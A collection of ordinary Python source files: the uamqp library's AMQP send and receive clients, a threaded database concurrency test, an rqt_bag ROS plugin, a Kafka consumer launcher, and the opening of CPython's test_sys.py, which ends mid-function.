:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param msg_timeout: A timeout in milliseconds for messages from when they have been
added to the send queue to when the message is actually sent. This prevents potentially
expired data from being sent. If set to 0, messages will not expire. Default is 0.
:type msg_timeout: int
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param max_message_size: The maximum allowed message size negotiated for the Link.
:type max_message_size: int
:param link_properties: Metadata to be sent in the Link ATTACH frame.
:type link_properties: dict
:param link_credit: The sender Link credit that determines how many
messages the Link will attempt to handle per connection iteration.
:type link_credit: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, target, auth=None, client_name=None, debug=False, msg_timeout=0,
error_policy=None, keep_alive_interval=None, **kwargs):
target = target if isinstance(target, address.Address) else address.Target(target)
self._msg_timeout = msg_timeout
self._pending_messages = []
self._waiting_messages = []
self._shutdown = None
# Sender and Link settings
self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
self._link_properties = kwargs.pop('link_properties', None)
self._link_credit = kwargs.pop('link_credit', None)
# AMQP object settings
self.sender_type = sender.MessageSender
super(SendClient, self).__init__(
target,
auth=auth,
client_name=client_name,
debug=debug,
error_policy=error_policy,
keep_alive_interval=keep_alive_interval,
**kwargs)
def _client_ready(self):
"""Determine whether the client is ready to start sending messages.
To be ready, the connection must be open and authentication complete,
The Session, Link and MessageSender must be open and in non-errored
states.
:rtype: bool
:raises: ~uamqp.errors.MessageHandlerError if the MessageSender
goes into an error state.
"""
# pylint: disable=protected-access
if not self.message_handler:
self.message_handler = self.sender_type(
self._session, self._name, self._remote_address,
name='sender-link-{}'.format(uuid.uuid4()),
debug=self._debug_trace,
send_settle_mode=self._send_settle_mode,
receive_settle_mode=self._receive_settle_mode,
max_message_size=self._max_message_size,
link_credit=self._link_credit,
properties=self._link_properties,
error_policy=self._error_policy,
encoding=self._encoding)
self.message_handler.open()
return False
if self.message_handler.get_state() == constants.MessageSenderState.Error:
raise errors.MessageHandlerError(
"Message Sender Client is in an error state. "
"Please confirm credentials and access permissions."
"\nSee debug trace for more details.")
if self.message_handler.get_state() != constants.MessageSenderState.Open:
return False
return True
def _on_message_sent(self, message, result, delivery_state=None):
"""Callback run on a message send operation. If message
has a user defined callback, it will be called here. If the result
of the operation is failure, the message state will be reverted
to 'pending' up to the maximum retry count.
:param message: The message that was sent.
:type message: ~uamqp.message.Message
:param result: The result of the send operation.
:type result: int
:param error: An Exception if an error ocurred during the send operation.
:type error: ~Exception
"""
# pylint: disable=protected-access
try:
exception = delivery_state
result = constants.MessageSendResult(result)
if result == constants.MessageSendResult.Error:
if isinstance(delivery_state, Exception):
exception = errors.ClientMessageError(delivery_state, info=delivery_state)
exception.action = errors.ErrorAction(retry=True)
elif delivery_state:
error = errors.ErrorResponse(delivery_state)
exception = errors._process_send_error(
self._error_policy,
error.condition,
error.description,
error.info)
else:
exception = errors.MessageSendFailed(constants.ErrorCodes.UnknownError)
exception.action = errors.ErrorAction(retry=True)
if exception.action.retry == errors.ErrorAction.retry \
and message.retries < self._error_policy.max_retries:
if exception.action.increment_retries:
message.retries += 1
self._backoff = exception.action.backoff
_logger.debug("Message error, retrying. Attempts: %r, Error: %r", message.retries, exception)
message.state = constants.MessageState.WaitingToBeSent
return
if exception.action.retry == errors.ErrorAction.retry:
_logger.info("Message error, %r retries exhausted. Error: %r", message.retries, exception)
else:
_logger.info("Message error, not retrying. Error: %r", exception)
message.state = constants.MessageState.SendFailed
message._response = exception
else:
_logger.debug("Message sent: %r, %r", result, exception)
message.state = constants.MessageState.SendComplete
message._response = errors.MessageAlreadySettled()
if message.on_send_complete:
message.on_send_complete(result, exception)
except KeyboardInterrupt:
_logger.error("Received shutdown signal while processing message send completion.")
self.message_handler._error = errors.AMQPClientShutdown()
def _get_msg_timeout(self, message):
current_time = self._counter.get_current_ms()
elapsed_time = (current_time - message.idle_time)
if self._msg_timeout > 0 and elapsed_time > self._msg_timeout:
return None
return self._msg_timeout - elapsed_time if self._msg_timeout > 0 else 0
def _transfer_message(self, message, timeout):
sent = self.message_handler.send(message, self._on_message_sent, timeout=timeout)
if not sent:
_logger.info("Message not sent, raising RuntimeError.")
raise RuntimeError("Message sender failed to add message data to outgoing queue.")
def _filter_pending(self):
filtered = []
for message in self._pending_messages:
if message.state in constants.DONE_STATES:
continue
elif message.state == constants.MessageState.WaitingForSendAck:
self._waiting_messages += 1
elif message.state == constants.MessageState.WaitingToBeSent:
message.state = constants.MessageState.WaitingForSendAck
try:
timeout = self._get_msg_timeout(message)
if timeout is None:
self._on_message_sent(message, constants.MessageSendResult.Timeout)
if message.state != constants.MessageState.WaitingToBeSent:
continue
else:
self._transfer_message(message, timeout)
except Exception as exp: # pylint: disable=broad-except
self._on_message_sent(message, constants.MessageSendResult.Error, delivery_state=exp)
if message.state != constants.MessageState.WaitingToBeSent:
continue
filtered.append(message)
return filtered
def _client_run(self):
"""MessageSender Link is now open - perform message send
on all pending messages.
Will return True if operation successful and client can remain open for
further work.
:rtype: bool
"""
# pylint: disable=protected-access
self.message_handler.work()
self._waiting_messages = 0
self._pending_messages = self._filter_pending()
if self._backoff and not self._waiting_messages:
_logger.info("Client told to backoff - sleeping for %r seconds", self._backoff)
self._connection.sleep(self._backoff)
self._backoff = 0
self._connection.work()
return True
@property
def _message_sender(self):
"""Temporary property to support backwards compatibility
with EventHubs.
"""
return self.message_handler
@property
def pending_messages(self):
return [m for m in self._pending_messages if m.state in constants.PENDING_STATES]
def redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if self._ext_connection:
raise ValueError(
"Clients with a shared connection cannot be "
"automatically redirected.")
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._pending_messages = []
self._remote_address = address.Target(redirect.address)
self._redirect(redirect, auth)
def queue_message(self, *messages):
"""Add one or more messages to the send queue.
No further action will be taken until either `SendClient.wait()`
or `SendClient.send_all_messages()` has been called.
The client does not need to be open yet for messages to be added
to the queue. Multiple messages can be queued at once:
- `send_client.queue_message(my_message)`
- `send_client.queue_message(message_1, message_2, message_3)`
- `send_client.queue_message(*my_message_list)`
:param messages: A message to send. This can either be a single instance
of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
:type message: ~uamqp.message.Message
"""
for message in messages:
for internal_message in message.gather():
internal_message.idle_time = self._counter.get_current_ms()
internal_message.state = constants.MessageState.WaitingToBeSent
self._pending_messages.append(internal_message)
def send_message(self, messages, close_on_done=False):
"""Send a single message or batched message.
:param messages: A message to send. This can either be a single instance
of `Message`, or multiple messages wrapped in an instance of `BatchMessage`.
:type message: ~uamqp.message.Message
:param close_on_done: Close the client once the message is sent. Default is `False`.
:type close_on_done: bool
:raises: ~uamqp.errors.MessageException if message fails to send after retry policy
is exhausted.
"""
batch = messages.gather()
pending_batch = []
for message in batch:
message.idle_time = self._counter.get_current_ms()
self._pending_messages.append(message)
pending_batch.append(message)
self.open()
running = True
try:
while running and any([m for m in pending_batch if m.state not in constants.DONE_STATES]):
running = self.do_work()
failed = [m for m in pending_batch if m.state == constants.MessageState.SendFailed]
if any(failed):
details = {"total_messages": len(pending_batch), "number_failed": len(failed)}
details['failed_messages'] = {}
exception = None
for failed_message in failed:
exception = failed_message._response # pylint: disable=protected-access
details['failed_messages'][failed_message] = exception
raise errors.ClientMessageError(exception, info=details)
finally:
if close_on_done or not running:
self.close()
def messages_pending(self):
"""Check whether the client is holding any unsent
messages in the queue.
:rtype: bool
"""
return bool(self._pending_messages)
def wait(self):
"""Run the client until all pending message in the queue
have been processed. Returns whether the client is still running after the
messages have been processed, or whether a shutdown has been initiated.
:rtype: bool
"""
running = True
while running and self.messages_pending():
running = self.do_work()
return running
def send_all_messages(self, close_on_done=True):
"""Send all pending messages in the queue. This will return a list
of the send result of all the pending messages so it can be
determined if any messages failed to send.
This function will open the client if it is not already open.
:param close_on_done: Close the client once the messages are sent.
Default is `True`.
:type close_on_done: bool
:rtype: list[~uamqp.constants.MessageState]
"""
self.open()
running = True
try:
messages = self._pending_messages[:]
running = self.wait()
results = [m.state for m in messages]
return results
finally:
if close_on_done or not running:
self.close()
class ReceiveClient(AMQPClient):
"""An AMQP client for receiving messages.
:param target: The source AMQP service endpoint. This can either be the URI as
a string or a ~uamqp.address.Source object.
:type target: str, bytes or ~uamqp.address.Source
:param auth: Authentication for the connection. This should be one of the subclasses of
uamqp.authentication.AMQPAuth. Currently this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param client_name: The name for the client, also known as the Container ID.
If no name is provided, a random GUID will be used.
:type client_name: str or bytes
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:param timeout: A timeout in milliseconds. The receiver will shut down if no
new messages are received after the specified timeout. If set to 0, the receiver
will never timeout and will continue to listen. The default is 0.
:type timeout: float
:param auto_complete: Whether to automatically settle message received via callback
or via iterator. If the message has not been explicitly settled after processing
the message will be accepted. Alternatively, when used with batch receive, this setting
will determine whether the messages are pre-emptively settled during batching, or otherwise
let to the user to be explicitly settled.
:type auto_complete: bool
:param error_policy: A policy for parsing errors on link, connection and message
disposition to determine whether the error should be retryable.
:type error_policy: ~uamqp.errors.ErrorPolicy
:param keep_alive_interval: If set, a thread will be started to keep the connection
alive during periods of user inactivity. The value will determine how long the
thread will sleep (in seconds) between pinging the connection. If 0 or None, no
thread will be started.
:type keep_alive_interval: int
:param send_settle_mode: The mode by which to settle message send
operations. If set to `Unsettled`, the client will wait for a confirmation
from the service that the message was successfully sent. If set to 'Settled',
the client will not wait for confirmation and assume success.
:type send_settle_mode: ~uamqp.constants.SenderSettleMode
:param receive_settle_mode: The mode by which to settle message receive
operations. If set to `PeekLock`, the receiver will lock a message once received until
the client accepts or rejects the message. If set to `ReceiveAndDelete`, the service
will assume successful receipt of the message and clear it from the queue. The
default is `PeekLock`.
:type receive_settle_mode: ~uamqp.constants.ReceiverSettleMode
:param desired_capabilities: The extension capabilities desired from the peer endpoint.
To create an desired_capabilities object, please do as follows:
- 1. Create an array of desired capability symbols: `capabilities_symbol_array = [types.AMQPSymbol(string)]`
- 2. Transform the array to AMQPValue object: `utils.data_factory(types.AMQPArray(capabilities_symbol_array))`
:type desired_capabilities: ~uamqp.c_uamqp.AMQPValue
:param max_message_size: The maximum allowed message size negotiated for the Link.
:type max_message_size: int
:param link_properties: Metadata to be sent in the Link ATTACH frame.
:type link_properties: dict
:param prefetch: The receiver Link credit that determines how many
messages the Link will attempt to handle per connection iteration.
The default is 300.
:type prefetch: int
:param max_frame_size: Maximum AMQP frame size. Default is 63488 bytes.
:type max_frame_size: int
:param channel_max: Maximum number of Session channels in the Connection.
:type channel_max: int
:param idle_timeout: Timeout in milliseconds after which the Connection will close
if there is no further activity.
:type idle_timeout: int
:param properties: Connection properties.
:type properties: dict
:param remote_idle_timeout_empty_frame_send_ratio: Ratio of empty frames to
idle time for Connections with no activity. Value must be between
0.0 and 1.0 inclusive. Default is 0.5.
:type remote_idle_timeout_empty_frame_send_ratio: float
:param incoming_window: The size of the allowed window for incoming messages.
:type incoming_window: int
:param outgoing_window: The size of the allowed window for outgoing messages.
:type outgoing_window: int
:param handle_max: The maximum number of concurrent link handles.
:type handle_max: int
:param on_attach: A callback function to be run on receipt of an ATTACH frame.
The function must take 4 arguments: source, target, properties and error.
:type on_attach: func[~uamqp.address.Source, ~uamqp.address.Target, dict, ~uamqp.errors.AMQPConnectionError]
:param encoding: The encoding to use for parameters supplied as strings.
Default is 'UTF-8'
:type encoding: str
"""
def __init__(
self, source, auth=None, client_name=None, debug=False, timeout=0,
auto_complete=True, error_policy=None, **kwargs):
source = source if isinstance(source, address.Address) else address.Source(source)
self._timeout = timeout
self._last_activity_timestamp = None
self._was_message_received = False
self._message_received_callback = None
self._streaming_receive = False
self._received_messages = compat.queue.Queue()
# Receiver and Link settings
self._max_message_size = kwargs.pop('max_message_size', None) or constants.MAX_MESSAGE_LENGTH_BYTES
self._prefetch = kwargs.pop('prefetch', None) or 300
self._link_properties = kwargs.pop('link_properties', None)
# AMQP object settings
self.receiver_type = receiver.MessageReceiver
self.auto_complete = auto_complete
super(ReceiveClient, self).__init__(
source, auth=auth, client_name=client_name, error_policy=error_policy, debug=debug, **kwargs)
@property
def _message_receiver(self):
"""Temporary property to support backwards compatibility
with EventHubs.
"""
return self.message_handler
def _client_ready(self):
"""Determine whether the client is ready to start receiving messages.
To be ready, the connection must be open and authentication complete,
The Session, Link and MessageReceiver must be open and in non-errored
states.
:rtype: bool
:raises: ~uamqp.errors.MessageHandlerError if the MessageReceiver
goes into an error state.
"""
# pylint: disable=protected-access
if not self.message_handler:
self.message_handler = self.receiver_type(
self._session, self._remote_address, self._name,
on_message_received=self._message_received,
name='receiver-link-{}'.format(uuid.uuid4()),
debug=self._debug_trace,
receive_settle_mode=self._receive_settle_mode,
send_settle_mode=self._send_settle_mode,
prefetch=self._prefetch,
max_message_size=self._max_message_size,
properties=self._link_properties,
error_policy=self._error_policy,
encoding=self._encoding,
desired_capabilities=self._desired_capabilities)
self.message_handler.open()
return False
if self.message_handler.get_state() == constants.MessageReceiverState.Error:
raise errors.MessageHandlerError(
"Message Receiver Client is in an error state. "
"Please confirm credentials and access permissions."
"\nSee debug trace for more details.")
if self.message_handler.get_state() != constants.MessageReceiverState.Open:
self._last_activity_timestamp = self._counter.get_current_ms()
return False
return True
def _client_run(self):
"""MessageReceiver Link is now open - start receiving messages.
Will return True if operation successful and client can remain open for
further work.
:rtype: bool
"""
self.message_handler.work()
self._connection.work()
now = self._counter.get_current_ms()
if self._last_activity_timestamp and not self._was_message_received:
# If no messages are coming through, back off a little to keep CPU use low.
time.sleep(0.05)
if self._timeout > 0:
timespan = now - self._last_activity_timestamp
if timespan >= self._timeout:
_logger.info("Timeout reached, closing receiver.")
self._shutdown = True
else:
self._last_activity_timestamp = now
self._was_message_received = False
return True
def _complete_message(self, message, auto): # pylint: disable=no-self-use
if not message or not auto:
return
message.accept()
def _message_generator(self):
"""Iterate over processed messages in the receive queue.
:rtype: generator[~uamqp.message.Message]
"""
self.open()
auto_complete = self.auto_complete
self.auto_complete = False
receiving = True
message = None
try:
while receiving:
while receiving and self._received_messages.empty():
receiving = self.do_work()
while not self._received_messages.empty():
message = self._received_messages.get()
self._received_messages.task_done()
yield message
self._complete_message(message, auto_complete)
finally:
self._complete_message(message, auto_complete)
self.auto_complete = auto_complete
self.close()
def _message_received(self, message):
"""Callback run on receipt of every message. If there is
a user-defined callback, this will be called.
Additionally if the client is retrieving messages for a batch
or iterator, the message will be added to an internal queue.
:param message: Received message.
:type message: ~uamqp.message.Message
"""
self._was_message_received = True
if self._message_received_callback:
self._message_received_callback(message)
self._complete_message(message, self.auto_complete)
if not self._streaming_receive:
self._received_messages.put(message)
elif not message.settled:
# Message was received with callback processing and wasn't settled.
_logger.info("Message was not settled.")
def receive_message_batch(self, max_batch_size=None, on_message_received=None, timeout=0):
"""Receive a batch of messages. Messages returned in the batch have already been
accepted - if you wish to add logic to accept or reject messages based on custom
criteria, pass in a callback. This method will return as soon as some messages are
available rather than waiting to achieve a specific batch size, and therefore the
number of messages returned per call will vary up to the maximum allowed.
If the receive client is configured with `auto_complete=True` then the messages received
in the batch returned by this function will already be settled. Alternatively, if
`auto_complete=False`, then each message will need to be explicitly settled before
it expires and is released.
:param max_batch_size: The maximum number of messages that can be returned in
one call. This value cannot be larger than the prefetch value, and if not specified,
the prefetch value will be used.
:type max_batch_size: int
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
:param timeout: I timeout in milliseconds for which to wait to receive any messages.
If no messages are received in this time, an empty list will be returned. If set to
0, the client will continue to wait until at least one message is received. The
default is 0.
:type timeout: float
"""
self._message_received_callback = on_message_received
max_batch_size = max_batch_size or self._prefetch
if max_batch_size > self._prefetch:
raise ValueError(
'Maximum batch size cannot be greater than the '
'connection link credit: {}'.format(self._prefetch))
timeout = self._counter.get_current_ms() + timeout if timeout else 0
expired = False
self.open()
receiving = True
batch = []
while not self._received_messages.empty() and len(batch) < max_batch_size:
batch.append(self._received_messages.get())
self._received_messages.task_done()
if len(batch) >= max_batch_size:
return batch
while receiving and not expired and len(batch) < max_batch_size:
while receiving and self._received_messages.qsize() < max_batch_size:
if timeout and self._counter.get_current_ms() > timeout:
expired = True
break
before = self._received_messages.qsize()
receiving = self.do_work()
received = self._received_messages.qsize() - before
if self._received_messages.qsize() > 0 and received == 0:
# No new messages arrived, but we have some - so return what we have.
expired = True
break
while not self._received_messages.empty() and len(batch) < max_batch_size:
batch.append(self._received_messages.get())
self._received_messages.task_done()
return batch
def receive_messages(self, on_message_received):
"""Receive messages. This function will run indefinitely, until the client
closes either via timeout, error or forced interruption (e.g. keyboard interrupt).
If the receive client is configured with `auto_complete=True` then the messages that
have not been settled on completion of the provided callback will automatically be
accepted provided it has not expired. If an error occurs or the message has expired
it will be released. Alternatively if `auto_complete=False`, each message will need
to be explicitly settled during the callback, otherwise it will be released.
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
"""
self._streaming_receive = True
self.open()
self._message_received_callback = on_message_received
receiving = True
try:
while receiving:
receiving = self.do_work()
except:
receiving = False
raise
finally:
self._streaming_receive = False
if not receiving:
self.close()
def receive_messages_iter(self, on_message_received=None):
"""Receive messages by generator. Messages returned in the generator have already been
accepted - if you wish to add logic to accept or reject messages based on custom
criteria, pass in a callback.
:param on_message_received: A callback to process messages as they arrive from the
service. It takes a single argument, a ~uamqp.message.Message object.
:type on_message_received: callable[~uamqp.message.Message]
"""
self._message_received_callback = on_message_received
return self._message_generator()
def redirect(self, redirect, auth):
"""Redirect the client endpoint using a Link DETACH redirect
response.
:param redirect: The Link DETACH redirect details.
:type redirect: ~uamqp.errors.LinkRedirect
:param auth: Authentication credentials to the redirected endpoint.
:type auth: ~uamqp.authentication.common.AMQPAuth
"""
if self._ext_connection:
raise ValueError(
"Clients with a shared connection cannot be "
"automatically redirected.")
if self.message_handler:
self.message_handler.destroy()
self.message_handler = None
self._shutdown = False
self._last_activity_timestamp = None
self._was_message_received = False
self._received_messages = compat.queue.Queue()
self._remote_address = address.Source(redirect.address)
self._redirect(redirect, auth)
|
concurrency_tests.py
|
import engine.db_structure as db_py
import threading
import os
filename = "concurrency.vdb"
if os.path.isfile(filename):
os.remove(filename)
db = db_py.Database(False, filename)
db.create_table("vadik_table", {"zhenya1": "int", "zhenya2": "str"})
def test_multithreading_insert():
def insert_func():
for i in range(10):
db.tables[0].insert(["zhenya1", "zhenya2"], [99, "test_string_123"])
thread1 = threading.Thread(target=insert_func)
thread2 = threading.Thread(target=insert_func)
thread1.start()
thread1.join()
thread2.start()
thread2.join()
assert db.tables[0].count_rows() == 20
def test_repeatable_read():
def func():
id = db.tables[0].start_transaction()
db.tables[0].update(["zhenya2"], [["TEST"]], [db.tables[0].get_row_by_id(1)], id)
db.tables[0].end_transaction(id)
id = db.tables[0].start_transaction()
selected_rows_one = db.tables[0].select(["zhenya2"], db.tables[0].get_row_by_id(1), id)
selected_value_one = selected_rows_one[0].fields_values_dict["zhenya2"]
thread = threading.Thread(target=func)
thread.start()
thread.join()
selected_rows_two = db.tables[0].select(["zhenya2"], db.tables[0].get_row_by_id(1), id)
selected_value_two = selected_rows_two[0].fields_values_dict["zhenya2"]
db.tables[0].end_transaction(id)
assert selected_value_one == selected_value_two
def test_multithreading_update():
def update_func_n(n):
def update_func():
db.tables[0].update(["zhenya1"], [[n]], [db.tables[0].get_row_by_id(4)])
return update_func
threads = []
for i in range(200):
func = update_func_n(i)
threads.append(threading.Thread(target=func))
for thread in threads:
thread.start()
thread.join()
assert db.tables[0].get_row_by_id(4).fields_values_dict["zhenya1"] == 199
|
bag.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import argparse
import threading
from qt_gui.plugin import Plugin
from .bag_widget import BagWidget
class Bag(Plugin):
"""
Subclass of Plugin to provide interactive bag visualization, playing(publishing) and recording
"""
def __init__(self, context):
"""
:param context: plugin context hook to enable adding widgets as a ROS_GUI pane, ''PluginContext''
"""
super(Bag, self).__init__(context)
self.setObjectName('Bag')
args = self._parse_args(context.argv())
self._widget = BagWidget(context, args.clock)
if context.serial_number() > 1:
self._widget.setWindowTitle(self._widget.windowTitle() + (' (%d)' % context.serial_number()))
context.add_widget(self._widget)
def load_bags():
for bagfile in args.bagfiles:
self._widget.load_bag(bagfile)
load_thread = threading.Thread(target=load_bags)
load_thread.start()
def _parse_args(self, argv):
parser = argparse.ArgumentParser(prog='rqt_bag', add_help=False)
Bag.add_arguments(parser)
return parser.parse_args(argv)
@staticmethod
def _isfile(parser, arg):
if os.path.isfile(arg):
return arg
else:
parser.error("Bag file %s does not exist" % ( arg ))
@staticmethod
def add_arguments(parser):
group = parser.add_argument_group('Options for rqt_bag plugin')
group.add_argument('--clock', action='store_true', help='publish the clock time')
group.add_argument('bagfiles', type=lambda x: Bag._isfile(parser, x),
nargs='*', default=[], help='Bagfiles to load')
def shutdown_plugin(self):
self._widget.shutdown_all()
def save_settings(self, plugin_settings, instance_settings):
# TODO implement saving
# instance_settings.set_value(k, v)
pass
def restore_settings(self, plugin_settings, instance_settings):
# TODO implement restoring
# v = instance_settings.value(k)
pass
#def trigger_configuration(self):
# TODO move some of the button functionality to config button if it is "more configy"
|
kafka_consumer.py
|
""" Copyright 2020 Expedia, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. """
from kafka_consumer.processor import KafkaProcessor
import threading
def main():
processor = KafkaProcessor(consumer_type="sns")
processor.process_message()
if __name__ == "__main__":
t = threading.Thread(target=main)
t.start()
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
from test.script_helper import assert_python_ok, assert_python_failure
import cStringIO
import gc
import operator
import os
import struct
import sys
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.test_support.reap_children()
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is not None)
self.assertTrue(value is exc)
self.assertTrue(traceback is not None)
with test.test_support.check_py3k_warnings():
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is None)
self.assertTrue(value is None)
self.assertTrue(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assertTrue(typ1 is typ2)
self.assertTrue(value1 is exc)
self.assertTrue(value1 is value2)
self.assertTrue(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
# both unnormalized...
rc, out, err = assert_python_failure('-c', 'raise SystemExit, 46')
self.assertEqual(rc, 46)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# ... and normalized
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
